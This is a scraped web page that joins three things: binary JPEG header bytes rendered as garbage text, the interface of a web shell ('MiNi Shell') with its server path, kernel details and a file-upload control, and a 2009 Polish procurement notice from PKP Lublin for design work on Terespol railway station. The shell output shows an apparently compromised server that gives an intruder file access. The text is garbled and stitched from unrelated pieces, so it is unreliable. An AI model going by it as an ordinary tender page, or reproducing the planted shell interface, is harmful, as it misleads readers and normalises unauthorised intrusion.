JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091016/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20091016/363398-N-2009.html

<p class="kh_header"><b>Lublin: WYKONANIE DOKUMENTACJI PROJEKTOWEJ BUDOWLANEJ I WYKONAWCZEJ DLA POTRZEB PRZEBUDOWY DWORCA KOLEJOWEGO TERESPOL</b><br>
<b>Numer ogłoszenia: 363398 - 2009; data zamieszczenia: 16.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> PKP S.A. Oddział Gospodarowania Nieruchomościami , ul. Okopowa 5, 20-022 Lublin, woj. lubelskie, tel. 81 472 34 03, faks 81 472 55 10.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka Akcyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> WYKONANIE DOKUMENTACJI PROJEKTOWEJ BUDOWLANEJ I WYKONAWCZEJ DLA POTRZEB PRZEBUDOWY DWORCA KOLEJOWEGO TERESPOL.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres zamówienia obejmuje:

1.wykonanie prac przedprojektowych:
- inwentaryzacja i ocena techniczna budynku (kubatura - 13 361 m3, powierzchnia użytkowa - 3 117 m2) niezbędna z punktu widzenia realizacji przedmiotu zamówienia.
- mapa do celów projektowych (w zakresie niezbędnym do opracowania przedmiotowej dokumentacji)
- program funkcjonalno użytkowy (zatwierdzenie programu odbędzie się w trybie planowanych narad koordynacyjnych w terminie nie dłuższym niż 3 dni od dnia przekazania przez Wykonawcę)

2. wykonanie w zakresie prac projektowych:
- dokumentacji projektowej - projektów budowlanych i wykonawczych wszystkich niezbędnych branż w zakresie dostosowanym do funkcji, jaką ma spełniać obiekt - obejmującej przebudowę budynku zgodnie z wymogami ustawy z dnia 07.07.1994 r. ustawy Prawo Budowlane oraz obowiązującymi normami i aktualnymi warunkami technicznymi oraz innymi przepisami obowiązującymi w dniu przekazania dokumentacji Zamawiającemu.
- Projekt powinien uwzględniać następujące elementy:

2.1. Roboty budowlane
2.1.1 zewnętrzne:
- termomodernizację dachu
- wymianę obróbek blacharskich, rynien, rur spustowych oraz przemurowanie kominów,
- wymianę stolarki okiennej i drzwiowej oraz aluminiowych przeszklonych fasad
- wykonanie nowych izolacji przeciwwilgociowych fundamentów (w miarę potrzeby)
- wykonanie elewacji budynku z termomodernizacją
2.1.2. wewnętrzne:
2.1.2.1 przebudowę pomieszczeń ogólnodostępnych polegającą na:
- naprawie i uzupełnieniu tynków wewnętrznych ścian i stropów wraz ze szpachlowaniem i malowaniem
- wykonaniu posadzek ceramicznych
- wykonaniu ceramicznych okładzin ściennych
- wykonaniu sufitu podwieszonego w holu kasowym
- wykonaniu schodów ruchomych na antresolę
- wykonaniu szybu windowego z zabudową windy osobowo-towarowej lub montażu platformy dla osób niepełnosprawnych
- dokumentacja powinna posiadać elementy wystroju wnętrz pomieszczeń ogólnodostępnych wraz z informacją wizualną w zakresie niezbędnym
- informacja wizualna elektroniczna
2.1.2.2. przebudowę sanitariatów dla podróżnych z dostosowaniem dla potrzeb osób niepełnosprawnych.
2.1.2.3. przebudowa kas z dostosowaniem do obowiązujących standardów (w tym do obsługi osób niepełnosprawnych)
2.1.2.4. adaptację pomieszczeń na potrzeby:
- opiekuna z dzieckiem,
- punktu medycznego
- punktu informacyjnego
- cichej poczekalni

2.2. Roboty sanitarne.
2.2.1. wewnętrzne:
- przebudowę instalacji kanalizacyjnej polegającej na wymianie starych żeliwnych pionów i poziomów
- przebudowę instalacji centralnego ogrzewania w zakresie wymiany pionów, poziomów oraz grzejników
- przebudowę instalacji wodociągowej
- przebudowę instalacji wentylacji mechanicznej wraz z elementami klimatyzacji.
- przebudowa pomieszczenia kotłowni wraz z technologią przystosowaną do opalania paliwem stałym.
2.2.2. zewnętrzne:
- wykonanie drenaży i odwodnień
- przebudowę sieci kanalizacyjnej sanitarnej (średnica 200 mm, kamionka, długość 40 mb) i burzowej (średnica 200 mm, kamionka, długość 150 mb)

2.3. Roboty elektryczne i teletechniczne.
- przebudowę instalacji wewnętrznych w pomieszczeniach ogólnodostępnych wraz z montażem nowych rozdzielni i opraw oświetleniowych
- wykonanie instalacji antywłamaniowej, TV przemysłowej, okablowania strukturalnego
- wykonanie instalacji ppoż., DSO, SAP
- wykonanie instalacji systemu informacji wizualnej (piktogramy, pragotrony, itp.)
- montaż monitoringu budynku (z włączeniem do systemu monitoringu z centrum w Lublinie ul. Okopowa 5 lub do systemu miasta Terespol)
- przebudowę instalacji odgromowej
- nowa instalacja telefoniczna
- instalacja głośnikowa zapowiadawcza
- sieć komputerowa i internetowa

2.4. Urządzenie terenu
- budowę parkingu dla samochodów i  rowerów o pow. 600 m2 wraz z odwodnieniem
- wykonanie oświetlenia zewnętrznego
- wykonanie ogrodzenia parkingu
- wykonanie izolacji przeciwwilgociowej tarasu wraz z wymianą nawierzchni
- elementy małej architektury

2.5. Dostosowanie obiektu do obecnie obowiązujących przepisów prawa budowlanego, bhp, sanitarno-epidemiologicznych, ochrony środowiska i p.poż.

3. W zakres dokumentacji projektowej budowlanej i wykonawczej dla potrzeb przebudowy dworca kolejowego Terespol wchodzi:

1) dokumentacja projektowa, składająca się z:
a) projektów budowlanych i wykonawczych - w każdej branży w wersji papierowej (pisemnej) w 5 egz. + 1 egz. w wersji elektronicznej
całość opracowań w wersji elektronicznej na płycie CD, zapisana w formacie *.pdf i *.dwg lub kompatybilnym  
w przypadku opracowań wykonanych techniką tradycyjną, bez użycia technik komputerowych wykonania należy zeskanować i umieścić na płycie CD zapisane w formacie *.jpg i *.pdf lub pochodnych.
b) przedmiarów robót opracowanych w oparciu o obowiązujące przepisy (Rozporządzenie Ministra Infrastruktury z 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz.U. Nr 202, poz. 2072 z późn. zmianami) - w wersji papierowej (pisemnej) w 2 egz.+ 1egz. w wersji elektronicznej na nośniku CD jako pliki programów kosztorysowych w rozszerzeniach *.ath lub kompatybilnym.

2) kosztorysów inwestorskich sporządzone w oparciu o obowiązujące przepisy (Rozporządzenie Ministra Infrastruktury z dnia 18.05.2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robot budowlanych określonych w programie funkcjonalno-użytkowym. (Dz. U. Nr 130, poz. 1389 z 2004 r. z późniejszymi zmianami) - 2 egz.+ 1 egz. w wersji elektronicznej na nośniku CD jako pliki programów kosztorysowych w rozszerzeniach *.ath lub kompatybilnym.
 
3) specyfikacji technicznych wykonania i odbioru robót w poszczególnych branżach - w wersji papierowej (pisemnej) w 2 egz. + 1 egz. w wersji elektronicznej jako pliki graficzne w rozszerzeniach *.pdf, (dopuszcza się wykorzystanie typowych specyfikacji.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6, 71.32.12.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 5.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> ZAMAWIAJĄCY WYMAGA WNIESIENIA WADIUM W WYSOKOŚCI 8000.00 ZŁ<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają wymagania określone w art. 22 ust.1 ustawy tj.:
1) posiadają uprawnienia do wykonywania działalności lub czynności, będących przedmiotem zamówienia;
2) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia tj.:
a) zrealizowali w ciągu ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeśli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 1 zamówienie na usługi projektowe odpowiadające swoim rodzajem usługom stanowiącym przedmiot zamówienia o kubaturze nie mniejszej niż kubatura obiektu będącego przedmiotem zamówienia.
b) przy wykonywaniu usług wymagane jest, aby co najmniej 1 osoba w każdej z następujących branż: architektonicznej, konstrukcyjno-budowlanej, drogowej, sanitarnej i elektrycznej posiadała uprawnienia budowlane bez ograniczeń do projektowania obiektu budowlanego. Należy dołączyć kserokopie uprawnień budowlanych tych osób oraz zaświadczeń o przynależności do izby samorządu zawodowego
3)znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia oraz posiadają potencjał finansowy pozwalający na realizację zamówienia tj.:
a) posiadają ubezpieczenie odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej zgodnej z przedmiotem niniejszego zamówienia
b) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia (art. 24 ust.1 i 2 ustawy)

2. Ocena spełnienia ww. warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w tyt. VII ust.1 niniejszej SIWZ. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż ww. warunki wykonawca spełnia. Zamawiający wzywa wykonawców, którzy w określonym terminie nie złożyli oświadczeń lub dokumentów, o których mowa w art. 25 ust.1 ustawy, lub którzy złożyli dokumenty, o których mowa w art. 25 ust. 1 ustawy, zawierające błędy, do ich uzupełnienia w wyznaczonym terminie chyba, że mimo ich uzupełnienia oferta wykonawcy podlega odrzuceniu lub konieczne byłoby unieważnienie postępowania.
3. Nie spełnienie chociażby jednego z ww. warunków skutkować będzie wykluczeniem Wykonawcy z postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. W celu potwierdzenia spełnienia warunków udziału w postępowaniu wykonawca obowiązany jest złożyć:
1) oświadczenie o spełnieniu warunków udziału w postępowaniu określonych w art.22 ust.1 ustawy - (wg wzoru stanowiącego załącznik nr 2 do niniejszej SIWZ);
2) aktualny odpis z właściwego rejestru lub zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; 
3) aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków lub zaświadczenie, że uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji organu podatkowego wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
4) aktualne zaświadczenie z właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
5) aktualną informację z Krajowego Rejestru Karnego albo równoważne zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust. 1 pkt. 4 - 9 ustawy wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
6) wykaz wykonanych w okresie ostatnich trzech lat usług projektowych, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem  przedmiotowi zamówienia. (wg zał. nr 4 do SIWZ) oraz posiadane dokumenty potwierdzające (referencje), że usługi te zostały wykonane należycie;
7) wykaz osób i podmiotów, które będą wykonywać zamówienie lub będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności (dla każdej specjalności podać numer uprawnień budowlanych, załączyć kserokopie uprawnień, a także aktualne zaświadczenia o przynależności do Izby Samorządu Zawodowego (wg zał. Nr 5 do SIWZ);
8)polisę lub inny dokument ubezpieczenia potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na okres realizacji zamówienia oraz zobowiązanie do zawarcie w razie konieczności dalszej umowy o odpowiedzialności cywilnej pod rygorem odstąpienia od umowy przez Zamawiającego (załącznik 5a SIWZ)
2. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej zamiast dokumentów o których mowa:
1) w ust.1 pkt 2, 3, 4, 5 - składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a) nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawione nie wcześniej niż 6 miesięcy przed terminem składania ofert,
b) nie zalega z uiszczeniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie  wcześniej niż 3 miesiące przed terminem składania ofert;
c) nie orzeczono wobec niego zakazu ubiegania się o zamówienie, wystawione nie wcześniej niż 6 miesięcy przed terminem składania ofert;
2) w ust. 1 pkt. 5 - składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą w zakresie określonym w art. 24 ust. 1 pkt.4 - 8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed terminem składania ofert.

3. Dokumenty mogą być przedstawione w formie oryginału lub kopii poświadczonych za zgodność z oryginałem przez należycie umocowanego przedstawiciela wykonawcy. Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu, gdy złożona przez wykonawcę kopia dokumentu jest nieczytelna lub budzi wątpliwości co do jej prawdziwości..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> NIE DOTYCZY.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ MOŻNA  UZYSKAĆ W SIEDZIBIE ZAMAWIAJĄCEGO LUBLIN UL. OKOPOWA 5 POK. 455 W GODZ. 9.00 DO 14.00  LUB DROGĄ ELEKTRONICZNĄ PO UPRZEDNIM WYSŁANIU ZAPOTRZEBOWANIA NA FAX NR (081) 472 55 10.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.11.2009 godzina 11:00, miejsce: LUBLIN UL. OKOPOWA 5 POK.461 IV PIĘTRO.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> P. Maria Tkaczyk - Naczelnik Wydziału Eksploatacji i Technicznego Utrzymania Nieruchomości Lublin, ul. Okopowa 5 pokój 474, tel. 0 81 472 5869

P. Waldemar Nowacki - inspektor nadzoru ds. budowlanych - Wydział Eksploatacji i Technicznego Utrzymania Nieruchomości  Lublin, ul. Okopowa 5 pokój 453, tel. 0 81 472 16 13;

Creat By MiNi SheLL
Email: jattceo@gmail.com